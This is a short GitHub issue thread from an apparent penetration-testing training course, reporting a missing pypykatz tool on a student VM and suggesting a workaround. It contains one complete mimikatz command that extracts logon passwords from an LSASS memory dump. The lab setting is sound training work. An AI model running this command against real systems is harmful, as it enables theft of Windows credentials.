### ISSUE TITLE
pypykatz.exe isn't loaded onto student VM (Stealing passwords with mimikatz)

### ISSUE THREAD

**Issue by jeffmcjunkin** [7MinSec/LPLITE#13]
**Where is the problem happening**
https://7minsec.teachable.com/courses/2053747/lectures/46224760

**Describe the problem**
![image](https://user-images.githubusercontent.com/1383363/234395518-3a2a8fe0-ac19-412b-933c-fc6176810422.png)

You could use Mimikatz instead, though: 
`C:\Users\Public\pentest-tools>mimikatz\x64\mimikatz.exe "sekurlsa::minidump C:\Users\Public\pentest-tools\dump.dmp" "sekurlsa::logonpasswords" "exit"`

**Comment by 7MinSec** [comment]
Thank you Jeff!  I've updated the instructions to use mimikatz instead of pypykatz.
